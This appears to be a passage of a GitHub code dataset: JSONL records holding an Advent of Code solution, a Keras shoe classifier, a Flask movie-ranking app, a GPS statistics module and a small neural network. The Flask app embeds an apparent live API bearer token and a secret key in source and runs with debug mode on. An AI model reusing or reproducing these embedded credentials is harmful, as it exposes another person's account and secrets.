DatasetJSON(bind=bind).get_value() == value\n", "repo_name": "PennyLaneAI/pennylane", "sub_path": "tests/data/attributes/test_json.py", "file_name": "test_json.py", "file_ext": "py", "file_size_in_byte": 616, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1965, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pytest.mark", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pennylane.data.attributes.json.DatasetJSON", "line_number": 15, "usage_type": "call"}, {"api_name": "pennylane.data.attributes.json.DatasetJSON", "line_number": 21, "usage_type": "call"}, {"api_name": "pennylane.data.attributes.json.DatasetJSON", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 8, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 8, "usage_type": "attribute"}]} +{"seq_id": "2167632970", "text": "import pathlib\nfrom collections import defaultdict\n\n\ndef find_joltage_differences_product(adapters: list[int]) -> int:\n jolt_differences = defaultdict(int)\n for index, adapter_jolts in enumerate(adapters[:-1]):\n jolt_differences[adapters[index + 1] - adapter_jolts] += 1\n return jolt_differences[1] * jolt_differences[3]\n\n\ndef find_num_valid_arrangements(adapters: list[int]) -> int:\n num_valid_arrangements = {0: 1}\n for adapter_jolts in adapters[1:]:\n num_valid_arrangements[adapter_jolts] = sum(\n num_valid_arrangements.get(adapter_jolts - jolt_difference, 0)\n for jolt_difference in range(1, 4)\n )\n return num_valid_arrangements[adapters[-1]]\n\n\nwith open(pathlib.Path(__file__).parent.parent / 'input.txt') as f:\n adapters = sorted(int(line) for line in f.read().splitlines())\n\nadapters.insert(0, 0)\nadapters.append(adapters[-1] + 3)\n\npart_one_solution = find_joltage_differences_product(adapters)\npart_two_solution = find_num_valid_arrangements(adapters)\n\nprint('Part One:', part_one_solution)\nprint('Part Two:', part_two_solution)\n\nassert part_one_solution == 2112\nassert part_two_solution == 3022415986688\n", "repo_name": "rhlahuja/advent-of-code-2020", "sub_path": "day-10/python/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "2792129827", "text": "from tensorflow import keras\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Flatten, MaxPooling2D, Dense, Dropout, GlobalAveragePooling2D\nfrom tensorflow.keras import optimizers, losses\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.preprocessing import image\n\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# notes\n# adidas - 285\n# altra - 138\n# asics - 455\n# joma - 144\n# nike - 205\n# new balance - 155\nbase_dir = 'train'\n\ndatagenerator = {\n \"train\": ImageDataGenerator(horizontal_flip=True,\n vertical_flip=True,\n rescale=1. / 255,\n validation_split=0.1,\n shear_range=0.1,\n zoom_range=0.1,\n width_shift_range=0.1,\n height_shift_range=0.1,\n rotation_range=30,\n ).flow_from_directory(directory=base_dir,\n target_size=(300, 300),\n subset='training',\n ),\n\n \"valid\": ImageDataGenerator(rescale=1 / 255,\n validation_split=0.1,\n ).flow_from_directory(directory=base_dir,\n target_size=(300, 300),\n subset='validation',\n ),\n}\n\n# Initializing InceptionV3 (pretrained) model with input image shape as (300, 300, 3)\nbase_model = InceptionV3(weights=None, include_top=False, input_shape=(300, 300, 3))\n\n# Load Weights for the InceptionV3 Model\nbase_model.load_weights('inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5')\n\n# Setting the Training of all layers of InceptionV3 model to false\nbase_model.trainable = False\n\n# Adding some more layers at the end of the Model as per our requirement\nmodel = Sequential([\n base_model,\n GlobalAveragePooling2D(),\n Dropout(0.15),\n Dense(1024, activation='relu'),\n Dense(6, activation='softmax') # 6 Output Neurons for 6 Classes\n])\n\n# Using the Adam Optimizer to set the learning rate of our final model\nopt = optimizers.Adam(learning_rate=0.0001)\n\n# Compiling and setting the parameters we want our model to use\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=['accuracy'])\n\n# Viewing the summary of the model\nmodel.summary()\n\n#from keras.utils.vis_utils import plot_model\n#print(plot_model(model, show_shapes=True, show_layer_names=True))\n\n# Setting variables for the model\nbatch_size = 32\nepochs = 10\n\n# Seperating Training and Testing Data\ntrain_generator = datagenerator[\"train\"]\nvalid_generator = datagenerator[\"valid\"]\n\n# Calculating variables for the model\nsteps_per_epoch = train_generator.n // batch_size\nvalidation_steps = valid_generator.n // batch_size\n\nprint(\"steps_per_epoch :\", steps_per_epoch)\nprint(\"validation_steps :\", validation_steps)\n\n# File Path to store the trained models\nfilepath = \"./model_{epoch:02d}-{val_accuracy:.2f}.h5\"\n\n# Using the ModelCheckpoint function to train and store all the best models\ncheckpoint1 = ModelCheckpoint(filepath, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')\n\ncallbacks_list = [checkpoint1]\n# Training the Model\nhistory = model.fit_generator(generator=train_generator, epochs=epochs, steps_per_epoch=steps_per_epoch,\n validation_data=valid_generator, validation_steps=validation_steps,\n callbacks=callbacks_list)\n\n# val_accuracy improved from 0.84375 to 0.90625, saving model to ./model_10-0.91.h5\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\n# ________________ Graph 1 -------------------------\n\nplt.figure(figsize=(8, 8))\nplt.subplot(2, 1, 1)\nplt.plot(acc, label='Training Accuracy')\nplt.plot(val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.ylabel('Accuracy')\nplt.ylim([min(plt.ylim()),1])\nplt.title('Training and Validation Accuracy')\n\n# ________________ Graph 2 -------------------------\n\nplt.subplot(2, 1, 2)\nplt.plot(loss, label='Training Loss')\nplt.plot(val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.ylabel('Cross Entropy')\nplt.ylim([0,max(plt.ylim())])\nplt.title('Training and Validation Loss')\nplt.show()\n\n# val_accuracy improved from 0.84375 to 0.90625, saving model to ./model_10-0.91.h5\n# Calculate the Loss and Accuracy on the Validation Data\ntest_loss, test_acc = model.evaluate(valid_generator)\nprint('test accuracy : ', test_acc)\n\n\n# # Check our folder and import the model with best validation accuracy\n# loaded_best_model = keras.models.load_model(\"./model_10-0.80.h5\")\n#\n#\n# # Custom function to load and predict label for the image\n# def predict(img_rel_path):\n# # Import Image from the path with size of (300, 300)\n# img = image.load_img(img_rel_path, target_size=(300, 300))\n#\n# # Convert Image to a numpy array\n# img = image.img_to_array(img, dtype=np.uint8)\n#\n# # Scaling the Image Array values between 0 and 1\n# img = np.array(img) / 255.0\n#\n# # Plotting the Loaded Image\n# plt.title(\"Loaded Image\")\n# plt.axis('off')\n# plt.imshow(img.squeeze())\n# plt.show()\n#\n# # Get the Predicted Label for the loaded Image\n# p = loaded_best_model.predict(img[np.newaxis, ...])\n#\n# # Label array\n# labels = {0: 'adidas', 1: 'converse', 2: 'nike'}\n#\n# print(\"\\n\\nMaximum Probability: \", np.max(p[0], axis=-1))\n# predicted_class = labels[np.argmax(p[0], axis=-1)]\n# print(\"Classified:\", predicted_class, \"\\n\\n\")\n#\n# classes = []\n# prob = []\n# print(\"\\n-------------------Individual Probability--------------------------------\\n\")\n#\n# for i, j in enumerate(p[0], 0):\n# print(labels[i].upper(), ':', round(j * 100, 2), '%')\n# classes.append(labels[i])\n# prob.append(round(j * 100, 2))\n#\n# def plot_bar_x():\n# # this is for plotting purpose\n# index = np.arange(len(classes))\n# plt.bar(index, prob)\n# plt.xlabel('Labels', fontsize=8)\n# plt.ylabel('Probability', fontsize=8)\n# plt.xticks(index, classes, fontsize=8, rotation=20)\n# plt.title('Probability for loaded image')\n# plt.show()\n#\n# plot_bar_x()\n\n", "repo_name": "petrsevcik/shoes_ml", "sub_path": "shoes.py", "file_name": "shoes.py", "file_ext": "py", "file_size_in_byte": 6786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.inception_v3.InceptionV3", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.GlobalAveragePooling2D", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers", "line_number": 69, "usage_type": "name"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}]} +{"seq_id": "71300193446", "text": "from flask import Flask, render_template, redirect, url_for, request\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, FloatField, SubmitField, validators\nimport requests\n\n# CONSTANTS\nDATABASE_URL = \"https://api.themoviedb.org/3/search/movie\"\nAUTHORIZATION = \"Bearer eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkMmRlY2NlZWEzZTgyMzkzMDIyZTYyZDc0OGZlMTdjMyIsInN1YiI6IjY1Mjg3ZDFkMGNiMzM1MTZmODgxZjcyNiIsInNjb3BlcyI6WyJhcGlfcmVhZCJdLCJ2ZXJzaW9uIjoxfQ.L0rWPxkiQgCpPXk3Y1GbLqPgcb5eV06MvR2jG4kVUew\"\nIMAGE_URL = \"https://image.tmdb.org/t/p/w780\"\nHEADERS = {\n \"accept\": \"application/json\",\n \"Authorization\": AUTHORIZATION,\n}\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'\n# Configure the SQLite database, relative to the app instance folder\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///top-10-movies.db\"\ndb = SQLAlchemy(app)\nBootstrap(app)\n\n\n# Define the form for adding a movie\nclass AddMovie(FlaskForm):\n movie_title = StringField('Movie Title', validators=[validators.DataRequired()])\n submit = SubmitField('Add Movie')\n\n\n# Define the form for editing a movie\nclass EditMovie(FlaskForm):\n rating = FloatField('Your Rating Out of 10 e.g. 7.5', validators=[validators.DataRequired()])\n review = StringField('Your Review', validators=[validators.DataRequired()])\n submit = SubmitField('Done')\n\n\n# Define the \"Movie\" model for the database\nclass Movie(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(250), unique=True, nullable=False)\n year = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n rating = db.Column(db.Float, nullable=True, default=0.0)\n ranking = db.Column(db.Integer, nullable=True, default=\"None\")\n review = db.Column(db.String(250), nullable=True, default=\"None\")\n img_url = db.Column(db.String(250), nullable=False)\n\n\n# Create the database tables\nwith app.app_context():\n db.create_all()\n\n\n@app.route(\"/\")\ndef home():\n all_movies = Movie.query.order_by(Movie.rating).all()\n\n for movie in range(len(all_movies)):\n all_movies[movie].ranking = len(all_movies) - movie\n db.session.commit()\n\n return render_template(\"index.html\", movies=all_movies)\n\n\n@app.route('/add', methods=['GET', 'POST'])\ndef add():\n form = AddMovie()\n if form.validate_on_submit():\n movie_title = form.movie_title.data\n response = requests.get(url=DATABASE_URL, headers=HEADERS, params={\"query\": movie_title})\n response.raise_for_status()\n data = response.json()[\"results\"]\n return render_template('select.html', options=data)\n return render_template('add.html', form=form)\n\n\n@app.route('/find')\ndef find_movie():\n movie_id = request.args.get('id')\n if movie_id:\n url = f\"{DATABASE_URL}/{movie_id}\"\n response = requests.get(url=url, headers=HEADERS)\n data = response.json()\n\n new_movie = Movie(\n title=data['title'],\n year=data['release_date'].split('-')[0],\n description=data['overview'],\n img_url=IMAGE_URL + data['poster_path']\n )\n db.session.add(new_movie)\n db.session.commit()\n\n return redirect(url_for('edit', id=new_movie.id))\n\n\n@app.route('/edit', methods=['GET', 'POST'])\ndef edit():\n form = EditMovie()\n movie_id = request.args.get('id')\n movie_to_update = Movie.query.get(movie_id)\n if form.validate_on_submit():\n movie_to_update.rating = form.rating.data\n movie_to_update.review = form.review.data\n db.session.commit()\n return redirect(url_for('home'))\n return render_template('edit.html', form=form, movie=movie_to_update)\n\n\n@app.route('/delete')\ndef delete():\n movie_id = request.args.get('id')\n movie_to_delete = Movie.query.get(movie_id)\n db.session.delete(movie_to_delete)\n db.session.commit()\n\n return redirect(url_for('home'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "Tolu792/python-projects", "sub_path": "Advanced Projects/Working with Databases/movie-project-start/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4060, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 17, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_bootstrap.Bootstrap", "line_number": 22, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 26, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 27, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 27, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 27, "usage_type": "name"}, {"api_name": "wtforms.SubmitField", "line_number": 28, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 32, "usage_type": "name"}, {"api_name": "wtforms.FloatField", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 33, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 34, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 34, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 34, "usage_type": "name"}, {"api_name": "wtforms.SubmitField", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 63, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 101, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "71423322726", "text": "\"\"\"\nHelper module to compute stats on GPS tracks\n\"\"\"\nimport datetime\n\nimport numpy as np\nfrom pint import UnitRegistry\n\nEARTHS_RADIUS_IN_KM = 6371.0 # in km\n\n\nclass Stats(object):\n \"\"\" Stats object to compute common statistics for a GPS track\"\"\"\n\n def __init__(self, trackpoints):\n self.trackpoints = trackpoints\n self.units = UnitRegistry()\n self.units.define('knots = knot')\n\n @property\n def full_start_time(self) -> datetime.datetime:\n \"\"\"Get the start date and time of the track\"\"\"\n return self.trackpoints[0]['timepoint']\n\n @property\n def full_end_time(self) -> datetime.datetime:\n \"\"\"Get the end date and time of the track\"\"\"\n return self.trackpoints[-1]['timepoint']\n\n @property\n def start_time(self) -> datetime.time:\n \"\"\"Get the start time of the track\"\"\"\n return self.full_start_time.time()\n\n @property\n def start_date(self) -> datetime.date:\n \"\"\"Get the start date of the track\"\"\"\n return self.full_start_time.date()\n\n @property\n def end_time(self) -> datetime.time:\n \"\"\"Get the end time of the track\"\"\"\n return self.full_end_time.time()\n\n @property\n def duration(self) -> datetime.timedelta:\n \"\"\"Get the duration of the track\"\"\"\n return self.full_end_time - self.full_start_time\n\n @property\n def speeds(self) -> list:\n \"\"\"Get the speed over ground at each trackpoint\"\"\"\n return [x['sog'] * (self.units.m / self.units.s)\n for x in self.trackpoints]\n\n @property\n def max_speed(self) -> float:\n \"\"\"Get the max instantaneous speed during the track\"\"\"\n return max(self.speeds)\n\n def distances(self, method='EquirecApprox') -> list:\n \"\"\"Get the trackpoint to trackpoint distances across the track\n\n Parameters\n ----------\n method : string\n The approximation methods to use for computing distances.\n\n 'EquirecApprox' (default) uses a rectangular approximation,\n ignoring that the surface of the earth is round. Fast, but not\n as accurate, especially for longer distances between points.\n\n 'Haversine' is more accurate, but slower.\n\n 'SphLawCos' is more accurate, but slower.\n \"\"\"\n\n lats = np.radians(np.asarray([x['lat'] for x in self.trackpoints]))\n lons = np.radians(np.asarray([x['lon'] for x in self.trackpoints]))\n\n lat1 = lats[0:-1]\n lat2 = lats[1:]\n lon1 = lons[0:-1]\n lon2 = lons[1:]\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n if method == 'Haversine':\n a_val = ((np.sin(dlat / 2))**2 +\n np.cos(lat1) * np.cos(lat2) * (np.sin(dlon/2))**2)\n dist = EARTHS_RADIUS_IN_KM * 2 * np.arctan2(np.sqrt(a_val),\n np.sqrt(1 - a_val))\n\n elif method == 'SphLawCos':\n dist = (np.arccos((np.sin(lat1) * np.sin(lat2)) +\n (np.cos(lat1) * np.cos(lat2) * np.cos(dlon))) *\n EARTHS_RADIUS_IN_KM)\n else:\n x_vals = (lon2-lon1) * np.cos((lat1+lat2)/2)\n y_vals = (lat2-lat1)\n dist = np.sqrt(x_vals**2 + y_vals**2) * EARTHS_RADIUS_IN_KM\n\n return dist * (self.units.m * 1000)\n\n def distance(self, method: str = 'EquirecApprox') -> float:\n \"\"\"Get the total distance covered by the track\n\n Parameters\n ----------\n method : string\n The approximation methods to use for computing distances. See\n `distances()` for details on the available methods.\n \"\"\"\n dist = self.distances(method)\n return np.sum(dist)\n\n def bearing(self) -> list:\n \"\"\"Calculate the instantaneous bearing between each trackpoint pair\"\"\"\n\n lats = np.deg2rad(np.asarray([x['lat'] for x in self.trackpoints]))\n lons = np.deg2rad(np.asarray([x['lon'] for x in self.trackpoints]))\n\n lat1 = lats[0:-1]\n lat2 = lats[1:]\n dlon = lons[1:] - lons[0:-1]\n\n x_vals = (np.cos(lat1) * np.sin(lat2)) \\\n - (np.sin(lat1) * np.cos(lat2) * np.cos(dlon))\n y_vals = np.sin(dlon) * np.cos(lat2)\n brn = np.rad2deg(np.arctan2(y_vals, x_vals))\n return np.mod(brn+360, 360)\n", "repo_name": "adamatus/sailtrail", "sub_path": "django/analysis/stats.py", "file_name": "stats.py", "file_ext": "py", "file_size_in_byte": 4335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pint.UnitRegistry", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 36, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 41, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.radians", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.radians", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "38534493389", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nfrom sklearn.utils import shuffle\nfrom utils import get_binary_data, initialise_weights_biases, relu, sigmoid, sigmoid_cost, error_rate\n\nclass ANN(object):\n def __init__(self, hidden_units):\n self.hidden_units = hidden_units\n\n def fit(self, Xtrain, Ytrain, learning_rate=1e-6, reg=1.0, epochs=10000, show_fig=False):\n Xtrain, Ytrain = shuffle(Xtrain, Ytrain)\n Xvalid, Yvalid = Xtrain[-1000:], Ytrain[-1000:]\n Xtrain, Ytrain = Xtrain[:-1000], Ytrain[:-1000]\n \n _, D = Xtrain.shape\n self.W1, self.b1 = initialise_weights_biases(D, self.hidden_units)\n self.W2, self.b2 = initialise_weights_biases(self.hidden_units, 1)\n\n costs = []\n best_validation_error = 1\n \n for i in range(epochs):\n \n # Forward propagation\n pY, Z = self.forward(Xtrain)\n\n # Gradient Descent\n deltaY = pY - Ytrain\n self.W2 -= learning_rate * (Z.T.dot(deltaY) + reg * self.W2)\n self.b2 -= learning_rate * ((deltaY).sum() + reg * self.b2)\n\n dZ = np.outer(deltaY, self.W2) * (Z > 0) # derivative of relu\n\n self.W1 -= learning_rate * (Xtrain.T.dot(dZ) + reg * self.W1)\n self.b1 -= learning_rate * (np.sum(dZ, axis=0) + reg * self.b1)\n\n if i % 20 == 0:\n pY_validation, _ = self.forward(Xvalid)\n cost = sigmoid_cost(Yvalid, pY_validation)\n costs.append(cost)\n erorr = error_rate(Yvalid, np.round(pY_validation))\n print(\"Epochs: {} | Cost: {} | Error Rate: {}\".format(i, cost, erorr))\n if erorr < best_validation_error:\n best_validation_error = erorr\n\n print(\"Best Validation Error: \", best_validation_error)\n\n if show_fig:\n plt.plot(costs)\n plt.title('Costs')\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Cost/Epoch\")\n plt.show()\n\n def forward(self, X):\n Z = relu(X.dot(self.W1) + self.b1)\n return sigmoid(Z.dot(self.W2) + self.b2), Z\n\n def predict(self, X):\n pY, _ = self.forward(X)\n return np.round(pY)\n\n def score(self, X, Y):\n prediction = self.predict(X)\n return 1 - error_rate(Y, prediction)\n\ndef main():\n Xtrain, Ytrain, Xtest, Ytest = get_binary_data(Ntest=1000, balance_class_one=True)\n model = ANN(100)\n\n model.fit(Xtrain, Ytrain, show_fig=True)\n\n print(\"Test Score: \", model.score(Xtest, Ytest))\n\nif __name__ == '__main__':\n main()\n\n\n", "repo_name": "AndreiRoibu/NeuralNetwoks", "sub_path": "facial_expression_recognition/neural_network_sigmoid.py", "file_name": "neural_network_sigmoid.py", "file_ext": "py", "file_size_in_byte": 2634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "seaborn.set", "line_number": 4, "usage_type": "call"}, {"api_name": "sklearn.utils.shuffle", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.initialise_weights_biases", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.initialise_weights_biases", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 37, "usage_type": "call"}, {"api_name": "utils.sigmoid_cost", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.error_rate", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "utils.relu", "line_number": 58, "usage_type": "call"}, {"api_name": "utils.sigmoid", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 63, "usage_type": "call"}, {"api_name": "utils.error_rate", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.get_binary_data", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "13876040891", "text": "import json\n\n\nclass Configuration:\n # class of configuration data\n\n # loads configuration from JSON file from provided path\n def __init__(self, filepath):\n self.data = None\n with open(filepath) as json_file:\n self.data 